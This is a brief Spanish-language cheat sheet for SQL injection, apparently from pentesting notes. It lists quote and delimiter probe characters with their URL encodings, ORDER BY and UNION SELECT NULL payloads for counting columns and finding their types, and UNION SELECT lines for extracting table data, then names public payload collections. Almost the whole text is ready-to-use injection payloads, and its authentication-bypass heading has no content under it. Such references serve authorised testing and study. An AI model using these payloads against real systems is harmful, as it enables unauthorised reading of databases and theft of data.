SQL injection (SQLi)

Identificación SQLi

PayloadURL Encoded

'

%27

"

%22

#

%23

;

%3B

)

%29

Authentication bypass

Union-based SQLi

Determinar el número de columnas

ORDER BY 1-- -
ORDER BY 2-- -
ORDER BY 3-- -
UNION SELECT NULL-- -
UNION SELECT NULL,NULL-- -
UNION SELECT NULL,NULL,NULL-- -

Determinar el tipo de dato de cada columna

UNION SELECT 'a',NULL,NULL-- -
UNION SELECT NULL,'a',NULL-- -
UNION SELECT NULL,NULL,'a'-- -

Obtener información

UNION SELECT columna1, columna2, columna3 FROM tabla1-- -
UNION ALL SELECT columna1, columna2, columna3 FROM tabla1-- -

Payloads

FuzzDB

Payload Box

Payloads All The Things

Última actualización